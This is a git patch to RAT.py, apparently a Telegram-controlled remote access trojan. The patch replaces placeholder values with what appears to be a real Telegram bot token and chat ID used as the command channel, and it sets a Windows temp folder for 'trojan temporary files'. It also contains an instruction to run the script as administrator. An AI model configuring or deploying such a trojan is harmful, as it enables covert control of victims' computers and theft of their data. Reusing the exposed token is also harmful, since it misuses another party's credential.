From 77940005ed1c625f6e5435d87b8ae942fc2c52b9 Mon Sep 17 00:00:00 2001 From: kingvirus0 <151681163+kingvirus0@users.noreply.github.com> Date: Mon, 7 Oct 2024 13:33:47 +0100 Subject: [PATCH] Update RAT.py --- RAT.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/RAT.py b/RAT.py index d55d0b7..a241372 100644 --- a/RAT.py +++ b/RAT.py @@ -2,8 +2,8 @@ # Token/ID -TelegramToken = 'TOKEN' -TelegramChatID = 'ID' +TelegramToken = '7004106798:AAGTUi-nzmTAzRtxrVDI978kkn6WoOYhiNo' +TelegramChatID = '7487861054' # Run the script as administrator @@ -35,4 +35,4 @@ # Directory for saving trojan temporary files -Directory = 'C:\\Windows\\Temp\\TelegramRAT\\' \ No newline at end of file +Directory = 'C:\\Windows\\Temp\\TelegramRAT\\'